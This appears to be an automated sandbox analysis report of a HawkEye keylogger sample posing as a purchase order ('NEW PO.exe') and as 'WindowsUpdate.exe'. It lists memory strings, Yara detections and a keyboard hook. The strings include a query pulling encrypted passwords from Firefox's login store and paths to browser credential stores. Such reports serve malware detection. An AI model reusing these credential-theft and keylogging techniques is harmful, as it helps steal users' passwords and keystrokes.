Source: vbc.exe, 00000016.00000003.419897387.0000000000B6E000.00000004.00000001.sdmp	String found in binary or memory: 8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://www.bing.com/orgid/idtoken/nosigninhttps://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp equals www.facebook.com (Facebook)
Source: vbc.exe, 00000016.00000003.419897387.0000000000B6E000.00000004.00000001.sdmp	String found in binary or memory: 8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://www.bing.com/orgid/idtoken/nosigninhttps://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp equals www.yahoo.com (Yahoo)
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000000A.00000000.316195444.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000000A.00000000.316195444.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000A.00000003.331400301.000000000059E000.00000004.00000001.sdmp	String found in binary or memory: me=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://www.bing.com/orgid/idtoken/nosigninhttps://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000A.00000003.331400301.000000000059E000.00000004.00000001.sdmp	String found in binary or memory: me=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://www.bing.com/orgid/idtoken/nosigninhttps://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.318319979.0000000002DF6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.392059792.00000000035EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.317941479.0000000002D6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313223758.0000000002D6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313404967.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.400644306.00000000035EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.435207427.0000000003338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.362383688.0000000002B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WerFault.exe PID: 6724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 4816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 3996, type: MEMORYSTR

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\NEW PO.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WindowsUpdate.exe

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	.Net Code: HookKeyboard

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe

Code function: 7_2_07A605A4 SetWindowsHookExA 0000000D,00000000,?,?

7_2_07A605A4

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,

10_2_0040D674

Source: WindowsUpdate.exe, 0000000F.00000002.355381618.0000000000FD8000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\NEW PO.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

